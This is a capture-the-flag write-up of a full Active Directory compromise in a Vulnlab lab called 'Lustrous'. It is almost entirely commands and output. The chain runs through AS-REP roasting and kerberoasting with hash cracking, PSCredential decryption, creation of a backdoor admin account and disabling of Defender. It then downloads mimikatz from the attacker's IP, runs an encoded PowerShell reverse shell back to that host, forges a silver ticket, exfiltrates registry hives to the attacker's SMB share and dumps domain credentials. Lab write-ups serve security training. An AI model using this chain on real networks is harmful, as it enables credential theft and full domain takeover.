vulnlab lustrous
Lustrous, a medium chain AD machine involved two machines, LusMS
and LusDC
, from LusMS, accessing the ftp share there were usernames which out of which ben.cox
didn’t require any pre-authentication, resulting in AS-REP roasting
, having remote access to LusMS, local administrator password found in a form of secure string that can be converted back to plaintext, getting the system account and accessing the web application on LusDC, it required kerberos authentication in order to access the site, since there was a service account with a SPN, on performing kerberoasting
, svc_web’s hash was cracked and with forging silver ticket
as tony.ward
who is a part of backup operator group, we can retrieve his password from the site and with impacket-reg
retrieving the SAM
, SYSTEM
and SECURITY
file and then dumping NTDS.dit file with LusDC hash to get domain admin
Writeup:
Enum anonymous ftp finds 3 users
After this we take a look for kerberoastable users
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ impacket-GetNPUsers -usersfile users.txt lustrous.vl/Username@lusdC.lustrous.vl -no-pass -dc-ip 10.10.187.53
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
$krb5asrep$23$ben.cox@LUSTROUS.VL:6c2235fc542be350acb491b50c61c07d$a9feb90a9a6784eba15a6af651082f5e97f3805acbf9dd672bc3a74ffdf4ef8700e34fc732393af129f6779f8023711787ace5213a4d7397c06621048dcd6ced94bcc3030e>
[–] User rachel.parker doesn‘t have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn’t have UF_DONT_REQUIRE_PREAUTH set
[–] User wayne.taylor doesn’t have UF_DONT_REQUIRE_PREAUTH set
.
impacket-GetUserSPNs -dc-ip 10.10.187.53 -usersfile users.txt -request lustrous.vl/‘ben.cox’:‘Trinity1’
crack some hashes
The hash identifier for Kerberos 5, etype 23, AS-REP hashes is 18200.
The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.
You can find this within the hashcat example hashes page.
hashcat -m 18200 -o cracked.txt ben.cox.hash /usr/share/wordlists/rockyou.txt
.
Do some Bloodhound analysis, to find high valuable targets
bloodhound-python -d lustrous.vl -c all -u ben.cox -p Trinity1 -ns 10.10.187.53 –dns-tcp
.
$ impacket-GetUserSPNs Lustrous.vl/ben.cox:Trinity1 -dc-ip lusdc.lustrous.vl -request-user svc_web
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
———————- ——- ——– ————————– ————————– ———-
http/lusdc svc_web 2021–12–22 13:46:12.670282 2021–12–27 13:45:43.927619
http/lusdc.lustrous.vl svc_web 2021–12–22 13:46:12.670282 2021–12–27 13:45:43.927619
[–] CCache file is not found. Skipping…
$krb5tgs$23$*svc_web$LUSTROUS.VL$Lustrous.vl/svc_web*$fec3e242194f52c140173bb7e0b2df73$e898fd0c2e9ea4fed53d9537a90e5c4daf043e597802909d35109f8891bc25e5a6aaaa6e2739e485425b244c3735913ff0f4426ce73c6021df92c557f4ab1eb6c481a657d26b801e18cc6af1cc789316f2045fc77e2cbaaf97aa6ae1fb7f26a0310bb149f06c2a65c3ba2315b3178d17669c8eb7a5c571f2bfaf5d0673dff09564526c9308ecc38663419cc55cc7f30ed1c7e8507f6b328284cfbf8911e9fcbfb57b4ccf0c5718e370450ab04b8c6e32fc9339fa3a3a9b349f9b6331d49a3bf080d8d1f94982d4aa87ec49de95d6efb283a196124c1b8cdd1a44c9b1201cf213a07dfb5ce2cda72465368796a991a4e25ed2165e9af342f39a06dd7acf1bcd8146036d64f8913c63c13c7c2ec8e15e3bcc364fc0a15bd8caef7ea023461fa8ddd6f734d2e5f5aa6ed2a544c09b05d653896e7a4c44d27ffba095be6aceec903378b6fc6ca41fc485fcaf5f041682a8c2a7510e23b827a542464e68002dee9cd17a5d09ca3f6b8a9d69fd34fcaa0eb35d36db5f47b9af13f8bac9ca2fe84eabb5858f8ba85864eed9b407c53426bbcde4742a66ac734365d4d72faa8d68e6db348b5e70c5abc6278dc474ab8d91fa45fc38447b470f3f5b480a3c27c34ffac8aff5e7cbed4dcb5ac4529cf42b0f3142d053879891bc224acece35f25164c38a9b2ab058bae92c0498051259c4cba97214aff005d8adba5a073be1cab0dc832abae307b04694c049bd52cf774829d4ae48c79abd188e373fb6108c351f12969e5badc2da61e0c0a0a063dbc637e08473d332fcccd8a3bbb45d5360bd2c11861fe94a290e357c18be4c2c0f849843f3e93ba81a34a1eca0661a7b24e7f3cb459cbd73a243d49b9357c70efcddabe13afa1d9778033681129046a8034b1dd26217dae4bde336b5871961623f2156515325888499f3a6cda70985981550d147f61f028040c9f6a6c78a8b9c406ca1b7d47ac14a25db13c48db0726f215c650723fd267dd9b832fda6700fc964c0df83369c4d21e475d69ac907d072b561aa6011a5bcca92d93ee834bee6619b3461bd9db8371cc6872b4adacadd07119dd3128073c03c110e1878f7d35e51eff75e15b774e5d0e7c775b94bf2a8c3dbac3ab7fa3f38670ed3b486f9c5a7245afa95550a43bd8dbd3d8923f18565a3899294dea285cc7f8e653a493283449cad01be0862053c1121563d7ebfb4e63e896e19d1216e31dde60e04e1b6ea383b7c6c8534c97c6ff9ebe5e0e5839cc0c267cebd21461b847c07285c6d99fe14b6d35b22b96f4242acd5d0668a1431d14a582b0a19a35bd657f29b230173fb9bf0a76ed88aff79947ebdc45ff4067c5aa96ccb37ff9633b9a77b4f241f8961334cbaec36007670f0e695a76c735a2cb4106ef6e2de129c964e8353b37db9d9cad57a0998979539ea8435ee2ed4ca05fbb7472e46a212a096f0bf75
.
The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.
You can find this within the hashcat example hashes page.
hashcat -m 13100 -o cracked_svcweb.hash.txt svcweb.hash /usr/share/wordlists/rockyou.txt
.
winrm to lusms.lustrous.vl
evil-winrm –ip lusms.lustrous.vl -u ‘ben.cox’ -p ‘Trinity1’
On Ben’s Desktop, we found an xml representation of a PSCredential Object file named admin.xml.
following this blog post, we can extract the cleartext data from the file
.
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> type admin.xml
<Objs Version=“1.1.0.1” xmlns=“http://schemas.microsoft.com/powershell/2004/04”>
<T>System.Management.Automation.PSCredential</T>
<ToString>System.Management.Automation.PSCredential</ToString>
<S N=“UserName”>LUSMS\Administrator</S>
<SS N=“Password”>01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $user = “Administrator”
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = “01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367”
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = “01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367” | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred.GetNetworkCredential() | Format-List
Password : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
SecurePassword : System.Security.SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>
logon as Administrator, and make ben.cox an admin
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ evil-winrm –ip lusms.lustrous.vl -u ‘Administrator’ -p ‘XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF’
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user puck Summer2024 /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators puck /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators ben.cox /add
The command completed successfully.
Look around
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ xfreerdp /u:puck /p:‘Summer2024’ /v:lusms.lustrous.vl /cert:ignore /rfx
start edge, login to https://lusdc.lustrous.vl as ben.cox
and find the secure note.
We have also the password for the service account, so we can craft a ticket for any other user. See: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
We go and disable windows defender and upload mimikatz, in our current powershell session , where we can store a new ticket for the administrator account
set-mppreference -disablerealtimemonitoring $true
iwr http://10.8.2.138/mimikatz.exe -outfile mimikatz.exe
then we use mkpsrevshell.py
python3 mkpsrevshell.py 10.8.2.138 443
.
─$ impacket-atexec ‘administrator’@10.10.207.70 “powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA”
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[!] This will work ONLY on Windows >= Vista
[*] Creating task \RqYvQaAv
[*] Running task \RqYvQaAv
[*] Deleting task \RqYvQaAv
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
All in one
PS C:\temp> .\mimikatz.exe “kerberos::purge” “kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward” “exit”
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. “A La Vie, A L’Amour” – (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
‘## v ##’ Vincent LE TOUX ( vincent.letoux@gmail.com )
‘#####’ > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1–5–21–2355092754–1584501958–1513963426
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 – rc4_hmac_nt
Target : lusdc.lustrous.vl
Lifetime : 9/21/2024 6:04:01 PM ; 9/19/2034 6:04:01 PM ; 9/19/2034 6:04:01 PM
–> Ticket : ** Pass The Ticket **
* EncTicketPart generated
* EncTicketPart encrypted
Golden ticket for ‘tony.ward @ lustrous.vl’ successfully submitted for current session
mimikatz(commandline) # exit
PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
Current LogonId is 0:0x3e7
#0> Client: tony.ward @ lustrous.vl
Server: http/lusdc.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 –> forwardable renewable pre_authent
Start Time: 9/21/2024 18:04:01 (local)
End Time: 9/19/2034 18:04:01 (local)
Renew Time: 9/19/2034 18:04:01 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
First we need the ntlm hash for the service account (svcweb)
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ iconv -f ASCII -t UTF-16LE <(printf “iydgTvmujl6f”) | openssl dgst -md4
MD4(stdin)= e67af8b3d78df5a02eb0d57b6cb60717
The following wmic command can be use to get the SID of tony.ward. ( or we use bloodhound for this )
C:\Windows\system32>wmic useraccount where name=‘tony.ward’ get sid
SID S-1–5–21–2355092754–1584501958–1513963426–1114
The NTLM hash we then use in the rc4 parameter
kerberos::golden /domain:lustrous.vl /user:administrator /sid:S-1–5–21–2355092754–1584501958–1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /ptt
and request our target website
iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
This gives us u
We better do not use an Administrator account for this ( meaning we need to use another target in our case tony.ward to caft a silver ticket for tony.ward
.
kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1–5–21–2355092754–1584501958–1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
in Administrative cmd prompt:
C:\Windows\system32>runas.exe /noprofile /netonly /user:lustrous\ben.cox cmd.exe
Enter the password for lustrous\ben.cox: Trinity1
Attempting to start cmd.exe as user “lustrous\ben.cox” …
then
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. “A La Vie, A L’Amour” – (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
‘## v ##’ Vincent LE TOUX ( vincent.letoux@gmail.com )
‘#####’ > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
Domain : lustrous.vl (LUSTROUS)
SID : S-1–5–21–2355092754–1584501958–1513963426
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 – rc4_hmac_nt
Target : LusDC.lustrous.vl
Lifetime : 7/27/2024 7:28:18 PM ; 7/25/2034 7:28:18 PM ; 7/25/2034 7:28:18 PM
–> Ticket : ** Pass The Ticket **
* EncTicketPart generated
* EncTicketPart encrypted
Golden ticket for ‘tony.ward @ lustrous.vl’ successfully submitted for current session
.
c:\temp>klist Current LogonId is 0:0x4900d
#0> Client: tony.ward @ lustrous.vl
Server: http/LusDC.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 –> forwardable renewable pre_authent
Start Time: 7/27/2024 19:28:18 (local)
End Time: 7/25/2034 19:28:18 (local)
Renew Time: 7/25/2034 19:28:18 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\temp> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content
<p>Welcome, LUSTROUS\Tony.Ward!</p>
<a class=“btn btn-danger” href=“/Internal
<input type=”button” value=”New Note” onclick=”window.location.href=‘/Internal/CreateNote’” />
<p>© 2024 – SNotes</p>
.
PRIVESC
Logged in as Ben powershell right click run as user tony.ward
PS C:\Users\ben.cox> whoami
PS C:\Users\ben.cox> cd c:\temp
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl –acl
[*] Identity: LocalService
\_ Registry Rights: -2147483648
[*] Identity: LocalService
\_ Registry Rights: ReadKey
[*] Identity: BUILTIN\Administrators
\_ Registry Rights: 268435456
[*] Identity: BUILTIN\Administrators
\_ Registry Rights: FullControl
[*] Identity: BUILTIN\Backup Operators
\_ Registry Rights: ReadKey
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl -o c:\windows\tasks\ –backup
[+] Exported \\lusdc.lustrous.vl\HKLM\SAM to c:\windows\tasks\3101BB00-F1ED-4F03-80F9-347F32D4F498
[+] Exported \\lusdc.lustrous.vl\HKLM\SYSTEM to c:\windows\tasks\B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[+] Exported \\lusdc.lustrous.vl\HKLM\SECURITY to c:\windows\tasks\2190EDEF-05BB-4DF7-B94A-729F19F83BBE
.
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ impacket-smbclient lustrous.vl/tony.ward:U_cP<redacted>0i1X@lusdc.lustrous.vl
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
Type help for list of commands
drw-rw-rw- 0 Sat Jul 27 13:51:14 2024 .
drw-rw-rw- 0 Sat May 27 20:32:06 2023 ..
-rw-rw-rw- 45056 Sat Jul 27 13:51:14 2024 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
-rw-rw-rw- 28672 Sat Jul 27 13:51:12 2024 3101BB00-F1ED-4F03-80F9-347F32D4F498
-rw-rw-rw- 16965632 Sat Jul 27 13:51:13 2024 B254B23F-CE5D-483A-9FAD-92192AF7CC4E
-rw-rw-rw- 6 Sat Jul 27 11:50:13 2024 SA.DAT
[*] Downloading 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
[*] Downloading 3101BB00-F1ED-4F03-80F9-347F32D4F498
[*] Downloading B254B23F-CE5D-483A-9FAD-92192AF7CC4E
or do it this way
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ impacket-smbserver smb . -smb2support
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610–9833-46C3F87E345A V:1.0
[*] Incoming connection (10.10.187.53,54551)
[*] AUTHENTICATE_MESSAGE (\,LUSDC)
[*] User LUSDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:smb)
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] LUSDC$::LUSTROUS:aaaaaaaaaaaaaaaa:a1abcb5128891908dd06050c91ebec30:0101000000000000002a54d31ee0da01c6fce3df3ca0410000000000010010006e0072006a00530065004b004f005800030010006e0072006a00530065004b004f00580002001000580070006f006200540046004900570004001000580070006f006200540046004900570007000800002a54d31ee0da0106000400020000000800300030000000000000000000000000400000e15257875fa1332fbc03b8a4fe3db518132560a8e7b113c3bb02a72a24cd55ff0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] Disconnecting Share(1:smb)
[*] Closing down connection (10.10.187.53,54551)
[*] Remaining connections []
.
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ impacket-reg lustrous.vl/‘tony.ward’:‘U_cP<redacted>0i1X’@10.10.187.53 -dc-ip 10.10.187.53 backup -o \\\\10.8.2.138\\smb
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe…
[*] Saved HKLM\SAM to \\10.8.2.138\smb\SAM.save
[*] Saved HKLM\SYSTEM to \\10.8.2.138\smb\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.2.138\smb\SECURITY.save
now get the machine hashes
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e<redacted>97:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[–] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn’t have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
$MACHINE.ACC:plain_password_hex:7c8bc87fdc872e790bbf7789dba9ca54bdcd339a4858b7f0400af019b1ea70c306ca1aa097c61c16db78634d36d95d639e9e5e9486f2ac9366898ab26783e513d475edb080e42b9aa2643b83b6fcca12a57e4232154ad8aa34c32b6d7d3182d2509d8b34990dd5c23852c0149382c412bf45352f3ae8a490a454e6bd4c64a3e441f6dbeecf5f48baedbe7ddae74dd77813392a73150fa751e33f8ac0338877c7f09e54e1baef33094f8a716cd1ccc389027d80c1b834d35edd8cb926a8ba3841ca8f6afb3fa9f53c9fb11c6483ebd1f3127725c2bb160ca325869e91e2136192b454c95bdd4b662f8596518dee210daf
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:28<redacted>54
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 …~…..9….$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF……..r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z…&.m…….
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 …?..^……$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
get the users hashes
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ impacket-secretsdump lustrous.vl/‘LUSDC$’@lusdc.lustrous.vl -hashes aad3b435b51404eeaad3b435b51404ee:28<redacted>54 -just-dc-user Administrator
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8<redacted>76:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:192dc734a2de3bc95bad85d2f4e3380a89ed9edb2341b124745d5dbf7ccdf6bd
Administrator:aes128-cts-hmac-sha1-96:854da5162b192ac9e6d3e15e52d326ff
Administrator:des-cbc-md5:c110a4f7f80d5d86
evil win-rm to the dc
┌──(puck㉿kali)–[~/vulnlab/lustrous]
└─$ evil-winrm –ip lusdc.lustrous.vl -u ‘Administrator’ -H ‘b8<redacted>76’
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
.
That was Fun !